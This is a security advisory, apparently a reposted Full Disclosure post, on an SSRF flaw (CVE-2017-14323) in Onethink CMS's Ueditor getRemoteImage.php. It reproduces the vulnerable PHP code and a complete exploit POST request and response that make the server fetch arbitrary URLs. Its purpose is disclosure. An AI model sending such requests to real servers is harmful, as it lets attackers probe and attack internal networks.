[FD] SSRF(Server Side Request Forgery) in Onethink All version (CVE-2017-14323)

# SSRF(Server Side Request Forgery) in Onethink All version (CVE-2017-14323) The Onethink is an open source CMS(Content Management System).This system is based on the Thinkphp3.2 development framework. ## Product Download: http://www.onethink.cn ## Vulnerability Type:SSRF(Server Side Request Forgery) ## Attack Type : Remote ## Vulnerability Description Onethink uses a Ueditor editor with a flawed version that causes the SSRF vulnerability to occur. The vulnerability code(/Public/static/ueditor/php/getRemoteImage.php): $uri = htmlspecialchars( $_POST[ ‘upfile’ ] ); $uri = str_replace( “&” , “&” , $uri ); getRemoteImage( $uri,$config ); //echo($uri); /** * 远程抓取 * @param $uri * @param $config */ function getRemoteImage( $uri,$config) { //忽略抓取时间限制 set_time_limit( 0 ); //ue_separate_ue ue用于传递数据分割符号 $imgUrls = explode( “ue_separate_ue” , $uri ); $tmpNames = array(); foreach ( $imgUrls as $imgUrl ) { //http开头验证 if(strpos($imgUrl,”http”)!==0){ array_push( $tmpNames , “error” ); continue; } //echo($imgUrl); //获取请求头 $heads = get_headers( $imgUrl ); //This is a blind ssrf //死链检测 if ( !( stristr( $heads[ 0 ] , “200” ) && stristr( $heads[ 0 ] , “OK” ) ) ) { array_push( $tmpNames , “error” ); continue; } //格式验证(扩展名验证和Content-Type验证) $fileType = strtolower( strrchr( $imgUrl , ‘.’ ) ); if ( !in_array( $fileType , $config[ ‘allowFiles’ ] ) || stristr( $heads[ ‘Content-Type’ ] , “image” ) ) { array_push( $tmpNames , “error” ); continue; } //var_dump($tmpNames); //打开输出缓冲区并获取远程图片 ob_start(); $context = stream_context_create( array ( ‘http’ => array ( ‘follow_location’ => false // don’t follow redirects ) ) ); //请确保php.ini中的fopen wrappers已经激活 readfile( $imgUrl,false,$context); //vulnerability is here,request any http(s) url $img = ob_get_contents(); ob_end_clean(); ## Exploit Request Content: POST http://target/Public/static/ueditor/php/getRemoteImage.php HTTP/1.1 Host: target User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 37 Connection: keep-alive upfile=https://ift.tt/2HfjJXT Response Content: HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Content-Length: 110 {‘url’:’upload/43361505134158.jpg’,’tip’:’远程图片抓取成功!’,’srcUrl’:’https://ift.tt/2uNQ3yp} modify the above upfile parameter,example: request http protocol: upfile=http://www.google.com request https protocol: upfile=https://www.google.com This vulnerability only use http、https protocol this vulnerability trigger need allow\_url\_fopen option is enable in php.ini,allow\_url\_fopen option defualt is enable. ## Versions Onethink all version ## Impact SSRF(Server Side Request Forgery) in Onethink V1.0 and V1.1 version allow remote attackers to information detection,internal network server attack. ## Credit This vulnerability was discovered by Qian Wu & Bo Wang & Jiawang Zhang & National Computer Network Emergency Response Technical Team/Coordination Center of China (CNCERT/CC) ## References CVE: https://ift.tt/2HfjM61 service@baimaohui.net

Source: Gmail -> IFTTT-> Blogger

from Blogger http://insidenothing.blogspot.com/2018/04/fd-ssrfserver-side-request-forgery-in_6.html
via IFTTT

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s